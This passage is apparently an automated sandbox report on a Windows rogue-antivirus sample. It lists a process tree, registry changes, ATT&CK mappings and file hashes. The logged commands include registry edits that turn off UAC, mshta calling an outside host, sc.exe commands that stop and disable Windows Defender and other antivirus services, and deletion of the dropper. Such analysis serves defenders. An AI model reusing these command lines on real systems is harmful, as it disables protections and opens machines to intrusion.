wrote to memory of 2596 2684 filesystemscan.exe 34 PID 2684 wrote to memory of 2596 2684 filesystemscan.exe 34 PID 2684 wrote to memory of 2596 2684 filesystemscan.exe 34 PID 2928 wrote to memory of 1988 2928 Protector-nua.exe 36 PID 2928 wrote to memory of 1988 2928 Protector-nua.exe 36 PID 2928 wrote to memory of 1988 2928 Protector-nua.exe 36 PID 2928 wrote to memory of 1988 2928 Protector-nua.exe 36 PID 2928 wrote to memory of 1988 2928 Protector-nua.exe 36 PID 2928 wrote to memory of 1988 2928 Protector-nua.exe 36 PID 2928 wrote to memory of 1988 2928 Protector-nua.exe 36 PID 2928 wrote to memory of 2860 2928 Protector-nua.exe 39 PID 2928 wrote to memory of 2860 2928 Protector-nua.exe 39 PID 2928 wrote to memory of 2860 2928 Protector-nua.exe 39 PID 2928 wrote to memory of 2860 2928 Protector-nua.exe 39 PID 2928 wrote to memory of 2860 2928 Protector-nua.exe 39 PID 2928 wrote to memory of 2860 2928 Protector-nua.exe 39 PID 2928 wrote to memory of 2860 2928 Protector-nua.exe 39 PID 2928 wrote to memory of 1144 2928 Protector-nua.exe 40 PID 2928 wrote to memory of 1144 2928 Protector-nua.exe 40 PID 2928 wrote to memory of 1144 2928 Protector-nua.exe 40 PID 2928 wrote to memory of 1144 2928 Protector-nua.exe 40 PID 2928 wrote to memory of 1144 2928 Protector-nua.exe 40 PID 2928 wrote to memory of 1144 2928 Protector-nua.exe 40 PID 2928 wrote to memory of 1144 2928 Protector-nua.exe 40 PID 2928 wrote to memory of 1972 2928 Protector-nua.exe 42 PID 2928 wrote to memory of 1972 2928 Protector-nua.exe 42 PID 2928 wrote to memory of 1972 2928 Protector-nua.exe 42 PID 2928 wrote to memory of 1972 2928 Protector-nua.exe 42 PID 2928 wrote to memory of 1972 2928 Protector-nua.exe 42 PID 2928 wrote to memory of 1972 2928 Protector-nua.exe 42 PID 2928 wrote to memory of 1972 2928 Protector-nua.exe 42 PID 2928 wrote to memory of 1516 2928 Protector-nua.exe 44 PID 2928 wrote to memory of 1516 2928 Protector-nua.exe 44 PID 2928 wrote to memory of 1516 2928 Protector-nua.exe 44 PID 2928 wrote to memory of 1516 2928 Protector-nua.exe 44 PID 2928 wrote to memory of 1516 2928 Protector-nua.exe 44 PID 2928 wrote to memory of 1516 2928 Protector-nua.exe 44 PID 2928 wrote to memory of 1516 2928 Protector-nua.exe 44 PID 2928 wrote to memory of 792 2928 Protector-nua.exe 46 -
System policy modification 1 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System Protector-nua.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Protector-nua.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Protector-nua.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" Protector-nua.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\8803b11dfdd25468983d1d2f9ff97f14_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\8803b11dfdd25468983d1d2f9ff97f14_JaffaCakes118.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\temp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\temp.exe" -e -p13317920072⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\filesystemscan.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\filesystemscan.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Users\Admin\AppData\Local\Protector-nua.exeC:\Users\Admin\AppData\Local\Protector-nua.exe4⤵
- UAC bypass
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2928 -
C:\Windows\SysWOW64\mshta.exemshta.exe "http://galaint.online-secure-pay.info/?0=154&1=0&2=1&3=24&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000&12=spwmsjcvew&14=1"5⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:1988
-
-
C:\Windows\SysWOW64\sc.exesc stop WinDefend5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2860
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1144
-
-
C:\Windows\SysWOW64\sc.exesc stop msmpsvc5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1972
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1516
-
-
C:\Windows\SysWOW64\sc.exesc config ekrn start= disabled5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:792
-
-
C:\Windows\SysWOW64\sc.exesc stop AntiVirService5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1464
-
-
C:\Windows\SysWOW64\sc.exesc config AntiVirService start= disabled5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2988
-
-
C:\Windows\SysWOW64\sc.exesc config AntiVirSchedulerService start= disabled5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2528
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\FILESY~1.EXE" >> NUL4⤵
- System Location Discovery: System Language Discovery
PID:2596
-
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -startmediumtab -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1596 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1596 CREDAT:275457 /prefetch:22⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:680
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
1Indicator Removal
1File Deletion
1Modify Registry
5Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
914B
MD5e4a68ac854ac5242460afd72481b2a44
SHA1df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA5125622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5
-
Filesize
1KB
MD5a266bb7dcc38a562631361bbf61dd11b
SHA13b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA5120da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5b62c7cb55d7b2e448903493bcca9c46a
SHA1a94708a499b35fe3687d9477a1e36365fb96087d
SHA25619cad3d9a6bca9b18a15d02f5dc125f9998c70c202768dc11cba7b505e0d74b0
SHA5128e47bd7ef395846899609462d34cf3a4bf66d46e46090cf241e8c928c789e445b3c191eb206519bdedf1b6bc25990ec30cf3f64f5fadcc665e6c5036e67de5d9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5599a9c3962cb10433ce2f87c7dce9f45
SHA16fb63945f376b46433a8e6d75d16c105fa5daeca
SHA2561edcc629ae1ea885a95dbb4b90cf1b06a9f55341462642ac4b2184ce6400065b
SHA5128696f6c9daf1b881453b4cdb3c4ce919ed6c9e3629a584e7e0b0a3ac1c5fdde4962caa5c8d1bf7958d45aa6c3d6c93e8367c4e869c08884e47a62e31bb128161
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD50350974829af7480482359d293f2aabe
SHA1d7ede272f6bd807f92e204b570eff82ace22041a
SHA256070e3fc1f9f46e6aaf3e1cacdf74a84086ae43189f2297d5c477ecf63dba84e2
SHA5129402244d8b41876675942ec5be8a2a24fd95904496181aacc54651d2d43c415628cbeea68b69ba34b981d89c7a3787c207a4f57d502d17503c11a97c9376716c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5fe83d045975e826ad9946d6c09df9b6f
SHA1b13baba6ba8211f9cefc918abb30df7105970a69
SHA256a2021fde81a7781f8ed06efc2299b9e0e82b55b5f7f0e8b3a2e8e32c1d2747ce
SHA512654d866f2afd8a12a6cafc2988f44e1634a1a1fbd650b3787995342166c09c220591073b228894e02ade4dfe5ff060cba461766c32ffeadbb2d799b7da9dd42f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5f63af2c2b06096d2add2f602588001a6
SHA14d265addcfedc2a8766e2195c01200394eb01e20
SHA2565881cb5cbb0e69de1c54f7da6b3afd2023c18ff00f8736898ce2a33c0aa86cb5
SHA51284b6462d03bb442017d7e07236adaaa4b93535a927841804454dfefd662240380301618fece6988038868a08302285ed0dc2f3152a0f9f6bd8010196431f55a6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5e8ad304f6dbd31e69d085d0a0c240395
SHA178fed165c7d57cf6fc4740563ccc9874c3d55d31
SHA256cef64d38c613180b251df863f3c1e2e2589653a374cc57b9693fc2357f04f358
SHA512c9332598359854e28599a37a93ff669f5b14a6df35e039b81b7e6dfb039e260b1fbeb97d78c4233b9bd64ea6b377368afa32761692434412c23c3de16b648943
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD52fcafcc03d9231199746a2493bb3e221
SHA1053fcd0cd348c788144bb5e7b2f7915c38e10cbc
SHA2562f9267023f93dcf8cfbb283a25cbeacf3e7d84fe8e046259a9d59755fcf36555
SHA512a29fdcf51d916871a8941713edcd4d3af2f5d2038168e25a413fa03a6601b38b087326f2477280e750a0120b51c51974f6d81e32734f13c33e24e5b1a53ed957
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5c6898e61dd4b3642a070f26ab7432e46
SHA1a674e5c5e6cc8e5b87de449fe8d38605a10cb1c1
SHA256ed04141d3004868cefb4e0e9b6d2b3c2a3f471282c7c8632181e5e205c01e009
SHA512fc0be0e06d832e2d9489a6bcd4902e286b3d9707729985e4b75f46955fd9fb0e83c40661ab5a12ebf5159e8c3fd8d65074a8e9d05480fdbe6b9497f296c51ac1
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5c2b3e55b11616eb167860975bfa68bc1
SHA14b84610973ae828942659dcce11c05a5e4e91095
SHA256b24fa5ef461a72304633efe244065e2fde4d055232cf972f36694d09a9b1d172
SHA512fdd46e5a858a0f27d77133c5349c59b61850968e71f1048a22eea23a42375d8f20b93cc686df628187ed6c47f0eca082264512a2947722b66a7e211c9b363a7e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD517e4cb40a93b1d69a4f717941e08ced4
SHA1ffa42bb0d9372593d85b9c92faf504419074e176
SHA2562b38818b38595b1ea22e74f5f34ddf0f7cf769506ef44e4cbe3d444b4e919e80
SHA5123e51d32a3a45b43f04136551d8c15771c8747c5a7ef5f538a29bc7d80d5b463440cd4f4fba9ae4d5bb1c0e7a2c04fb7bc0033b0b82c13b5ea29d9c7b3f90c98c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD52d47397c97e7f01b2e4e52906545b4fb
SHA1e55de57c4e5238fb3ecf72a8f08abef0ce51e318
SHA25656400c7d16f02f3114d266bdd008dd77d8495e5b10406e127dcf09eb73ee43cb
SHA51268a8188501a2d07d35beb2f96928a66a349ae52e50d0b0fdd1d255d98230b6e221efbeede1c6acf47d489c261249c0bcdec59743bbd2af52dbf054530040db6b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize242B
MD523e28975118279a131c4dac7fab3e5ca
SHA190c2c049d042b5756b86f23d8264596ef00a9197
SHA2564dfd571f4f362c87edd6063d60e27f1582d9b8992656e19401584394f4342b5c
SHA512738652ab817fb39280ea6ebf0029d26c8e52ae28d66d996b300301134613c56e9aac9eb6875eeeab11d22e6c5258286f9168b6d602e9f2eaa631a0861410f0bb
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
1.9MB
MD565a93cb59b089bd678ab56b60fb7a060
SHA15bf9efe4df77c1838fd8d39bf8bc1fa1b63c2a2b
SHA256830f016b394d0ff5e80e510fa7f17e9622287a276ad9dcf58b25f3dc57992922
SHA51240869f6aba6def8accb54b602f92e9d9cb61a721d5225126ef6bba8f057642cfcf834c2a835781bffe13bcdc2e305f9b31cbe000e89d9a3314116fdc2e4e67fc
-
Filesize
1.9MB
MD5af211d2b578be48a9ff226c00d53e9f6
SHA102247608e3dcd6fc6e5fc3b78d086ad60ab4e6f9
SHA256ec75dc6b3fdc9c91e24ec89d6fdd066aefe6319cb967f06e25a2816ec5a8e5b5
SHA51246af84cb4bed22e5383ea9db34f872547bbc2d5d99a0c4c1a029a8160b0fefb6fcecd2264b1ff918f7910b949e8c256c7d6581f154e7167446a19149d08c2012